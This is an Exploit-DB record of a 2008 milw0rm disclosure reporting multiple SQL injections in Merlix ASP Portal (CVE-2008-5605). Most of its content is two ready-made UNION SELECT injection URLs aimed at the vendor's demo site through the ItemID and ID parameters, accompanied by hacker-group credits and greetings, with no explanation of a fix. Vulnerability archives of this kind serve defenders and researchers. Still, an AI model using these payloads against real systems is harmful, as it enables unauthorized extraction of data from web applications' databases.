ASP Portal - Multiple SQL Injections

EDB-ID:

7357

CVE:

2008-5605

EDB Verified:

Author:

AlpHaNiX

Type:

webapps

Exploit: /

Platform:

ASP

Date:

2008-12-05

Vulnerable App:

###########################################################################
#---------------------------------------------------OffensiveTrack--------------------------------------------------------#
###########################################################################

---------------------------- Tunisian Muslim ------------------------------

#found by : OffensiveTrack
#Author   : AlpHaNiX
#website  : www.offensivetrack.org
#contact  : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script   : Merlix ASP PORTAL
#download : null
#Demo     : http://demo.merlix.com/portal/


#Exploit :
--=[SQL INJECTION]=--
http://demo.merlix.com/portal/classifieds.asp?ItemID=-0+union+select+1,2,3,4,5,6,7,8,9,10+from+Directory
http://demo.merlix.com/portal/Events.asp?ID=-0+union+select+1,2,3,4,5,6,7,8+from+Directory



#Greetz For Synex

###########################################################################

# milw0rm.com [2008-12-05]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services